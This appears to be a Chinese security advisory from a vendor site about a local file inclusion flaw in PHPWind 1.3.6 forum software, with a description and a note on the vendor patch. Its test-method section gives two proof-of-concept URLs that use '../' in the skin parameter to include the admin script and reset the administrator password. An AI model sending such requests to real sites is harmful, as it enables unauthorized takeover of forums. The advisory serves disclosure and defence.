安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
PHPWind skin变量本地文件包含漏洞
发布日期:
2005-02-02
更新日期:
2005-02-02
受影响系统:
PHPWind PHPWind 1.3.6
描述:
PHPWind是一款国内比较流行的基于PHP的Web论坛程序。
PHPWind实现上存在输入验证漏洞,远程攻击者可能利用此漏洞非授权获取论坛的管理员权限,结合其他漏洞可以在主机上以Web进程权限执行任意命令。
PHPWind对用户提交的skin变量未做充分的过滤检查,远程攻击者可以在输入中插入“../”字串包含本地的其他脚本文件执行,比如,攻击者可以把本来需要授权才能访问的后台管理脚本包含进来执行,修改管理员口令,从而获取论坛的管理员权限。结合网页的CSS问题,攻击者可以以Web进程权限执行任意命令。
<*链接:
http://www.securityfaq.org/wz/596/article.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://localhost/phpwind/faq.php?skin=../../admin/manager&tplpath=admin
http://localhost/phpwind/faq.php?skin=../../admin/manager&username=admin&password=xiaohua&check_pwd=xiaohua&action=go
建议:
厂商补丁:
PHPWind
-------
目前厂商已经在最新版本的软件中修复了这个安全问题,请到厂商的主页下载:
http://www.phpwind.net/
浏览次数:
3171
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客